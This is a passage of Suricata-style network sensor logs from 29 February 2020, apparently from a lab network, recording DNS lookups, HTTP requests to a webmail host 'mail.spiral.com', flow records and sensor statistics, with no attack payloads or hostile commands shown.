{"timestamp":"2020-02-29T00:13:53.235775+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38101,"proto":"UDP","dns":{"type":"answer","id":60152,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:53.235775+0000","flow_id":902968232767834,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":38101,"proto":"UDP","dns":{"type":"answer","id":60152,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:53.376536+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7921}} {"timestamp":"2020-02-29T00:13:54.000207+0000","event_type":"stats","stats":{"uptime":14486,"capture":{"kernel_packets":135553,"kernel_drops":0},"decoder":{"pkts":135569,"bytes":93377242,"invalid":187,"ipv4":134070,"ipv6":8,"ethernet":135569,"raw":0,"null":0,"sll":0,"tcp":128752,"udp":5116,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098784},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2775,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2791,"synack":2782,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1814,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2337,"failed_udp":112},"tx":{"http":4669,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2417}},"flow_mgr":{"closed_pruned":2754,"new_pruned":15,"est_pruned":2379,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":23800,"memcap_state":0,"memcap_global":0},"http":{"memuse":138450,"memcap":0}}} {"timestamp":"2020-02-29T00:13:56.000396+0000","flow_id":886797661356645,"event_type":"flow","src_ip":"192.168.10.122","src_port":51170,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:55.311909+0000","end":"2020-02-29T00:08:55.421067+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:13:56.836058+0000","flow_id":1297456683777400,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34824,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8117},"app_proto":"http","fileinfo":{"filename":"\/nag\/","state":"CLOSED","stored":false,"size":33564,"tx_id":0}} {"timestamp":"2020-02-29T00:13:57.000208+0000","flow_id":432368661990283,"event_type":"flow","src_ip":"192.168.10.81","src_port":52746,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":11,"pkts_toclient":12,"bytes_toserver":1832,"bytes_toclient":8349,"start":"2020-02-29T00:12:50.953227+0000","end":"2020-02-29T00:12:56.254674+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:57.001387+0000","flow_id":1905800142540588,"event_type":"flow","src_ip":"192.168.10.81","src_port":52744,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":1082,"bytes_toclient":1019,"start":"2020-02-29T00:12:50.937772+0000","end":"2020-02-29T00:12:56.091654+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:13:57.589667+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":7921},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":44801,"tx_id":0}} {"timestamp":"2020-02-29T00:13:57.600559+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":43502,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":61162,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:13:57.709068+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43502,"proto":"UDP","dns":{"type":"answer","id":61162,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:13:57.709068+0000","flow_id":1485649266158063,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":43502,"proto":"UDP","dns":{"type":"answer","id":61162,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:13:57.765520+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52754,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5464}} {"timestamp":"2020-02-29T00:14:00.000707+0000","flow_id":795898973717572,"event_type":"flow","src_ip":"192.168.10.122","src_port":44755,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:08:59.853060+0000","end":"2020-02-29T00:08:59.961986+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:01.000432+0000","event_type":"stats","stats":{"uptime":14493,"capture":{"kernel_packets":135593,"kernel_drops":0},"decoder":{"pkts":135603,"bytes":93394794,"invalid":187,"ipv4":134104,"ipv6":8,"ethernet":135603,"raw":0,"null":0,"sll":0,"tcp":128782,"udp":5120,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2776,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2792,"synack":2783,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1815,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2339,"failed_udp":112},"tx":{"http":4671,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2419}},"flow_mgr":{"closed_pruned":2756,"new_pruned":15,"est_pruned":2380,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":23470,"memcap_state":0,"memcap_global":0},"http":{"memuse":87581,"memcap":0}}} {"timestamp":"2020-02-29T00:14:01.005964+0000","flow_id":1395802825860624,"event_type":"flow","src_ip":"192.168.10.122","src_port":56407,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:00.304656+0000","end":"2020-02-29T00:09:00.413211+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:02.766663+0000","flow_id":218925971392270,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52754,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/mnemo\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5464},"app_proto":"http","fileinfo":{"filename":"\/mnemo\/","state":"CLOSED","stored":false,"size":28285,"tx_id":1}} {"timestamp":"2020-02-29T00:14:05.000841+0000","flow_id":98370530812316,"event_type":"flow","src_ip":"192.168.10.81","src_port":52748,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1290,"bytes_toclient":810,"start":"2020-02-29T00:12:59.565660+0000","end":"2020-02-29T00:13:04.757093+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:05.878088+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37310,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32867,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:05.986371+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37310,"proto":"UDP","dns":{"type":"answer","id":32867,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:05.986371+0000","flow_id":390853513012744,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37310,"proto":"UDP","dns":{"type":"answer","id":32867,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:06.315620+0000","flow_id":756720302109332,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34826,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6756}} {"timestamp":"2020-02-29T00:14:07.002983+0000","flow_id":1205458465593479,"event_type":"flow","src_ip":"192.168.10.122","src_port":58650,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.858247+0000","end":"2020-02-29T00:09:06.968272+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:07.003817+0000","flow_id":1235763754834258,"event_type":"flow","src_ip":"192.168.10.122","src_port":50319,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.465234+0000","end":"2020-02-29T00:09:06.573102+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:07.003916+0000","flow_id":816196989671691,"event_type":"flow","src_ip":"192.168.10.122","src_port":40498,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:06.448779+0000","end":"2020-02-29T00:09:06.557375+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:08.000400+0000","event_type":"stats","stats":{"uptime":14500,"capture":{"kernel_packets":135612,"kernel_drops":0},"decoder":{"pkts":135615,"bytes":93396136,"invalid":187,"ipv4":134114,"ipv6":8,"ethernet":135615,"raw":0,"null":0,"sll":0,"tcp":128790,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1815,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2757,"new_pruned":15,"est_pruned":2382,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22478,"memcap_state":0,"memcap_global":0},"http":{"memuse":87604,"memcap":0}}} {"timestamp":"2020-02-29T00:14:11.000286+0000","flow_id":858648459774048,"event_type":"flow","src_ip":"192.168.10.130","src_port":34810,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":13,"bytes_toserver":3106,"bytes_toclient":7263,"start":"2020-02-29T00:12:30.428128+0000","end":"2020-02-29T00:13:10.761246+0000","age":40,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:11.001647+0000","flow_id":339305296184252,"event_type":"flow","src_ip":"192.168.10.122","src_port":33829,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:09:10.345020+0000","end":"2020-02-29T00:09:10.453617+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:11.316083+0000","flow_id":756720302109332,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34826,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/mnemo\/list.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6756},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":33150,"tx_id":0}} {"timestamp":"2020-02-29T00:14:13.001135+0000","flow_id":1076287324585437,"event_type":"flow","src_ip":"192.168.10.122","src_port":37956,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:09:12.622045+0000","end":"2020-02-29T00:09:12.730774+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:14:15.000220+0000","event_type":"stats","stats":{"uptime":14507,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096768},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2758,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21817,"memcap_state":0,"memcap_global":0},"http":{"memuse":35749,"memcap":0}}} {"timestamp":"2020-02-29T00:14:16.000255+0000","flow_id":579939444423429,"event_type":"flow","src_ip":"192.168.10.81","src_port":52750,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":22,"bytes_toserver":3065,"bytes_toclient":20115,"start":"2020-02-29T00:13:07.293637+0000","end":"2020-02-29T00:13:15.784000+0000","age":8,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:18.000797+0000","flow_id":700400392481363,"event_type":"flow","src_ip":"192.168.10.130","src_port":34816,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1095,"bytes_toclient":6515,"start":"2020-02-29T00:13:12.010835+0000","end":"2020-02-29T00:13:17.187494+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:22.000276+0000","event_type":"stats","stats":{"uptime":14514,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7096192},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2760,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21817,"memcap_state":0,"memcap_global":0},"http":{"memuse":35589,"memcap":0}}} {"timestamp":"2020-02-29T00:14:25.000341+0000","flow_id":875772497513137,"event_type":"flow","src_ip":"192.168.10.81","src_port":52752,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":6,"pkts_toclient":4,"bytes_toserver":1299,"bytes_toclient":1107,"start":"2020-02-29T00:13:18.871089+0000","end":"2020-02-29T00:13:24.094914+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:14:28.540604+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":51842,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":5997,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:14:28.697243+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51842,"proto":"UDP","dns":{"type":"answer","id":5997,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:14:28.697243+0000","flow_id":645029679087548,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":51842,"proto":"UDP","dns":{"type":"answer","id":5997,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:14:28.779172+0000","flow_id":1080320319612926,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34828,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/nag\/task.php?tasklist=KCDsO_NmBjYX5zVsrCfQDx7&task=CzzvouuXL90PtKLh7taEoDK&actionID=modify_task&have_search&tab_name=1&url=%2Fnag%2F","http_user_agent":"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Ubuntu Chromium\/77.0.3865.90 HeadlessChrome\/77.0.3865.90 Safari\/537.36","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/nag\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8792}} {"timestamp":"2020-02-29T00:14:29.000160+0000","event_type":"stats","stats":{"uptime":14521,"capture":{"kernel_packets":135627,"kernel_drops":0},"decoder":{"pkts":135632,"bytes":93404337,"invalid":187,"ipv4":134129,"ipv6":8,"ethernet":135632,"raw":0,"null":0,"sll":0,"tcp":128805,"udp":5122,"sctp":0,"icmpv4":15,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":688,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095904},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2777,"ssn_memcap_drop":0,"pseudo":347,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2793,"synack":2784,"rst":1207,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":142,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1816,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":103,"dcerpc_udp":0,"dns_udp":2340,"failed_udp":112},"tx":{"http":4672,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2420}},"flow_mgr":{"closed_pruned":2761,"new_pruned":15,"est_pruned":2387,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":22148,"memcap_state":0,"memcap_global":0},"http":{"memuse":86225,"memcap":0}}} 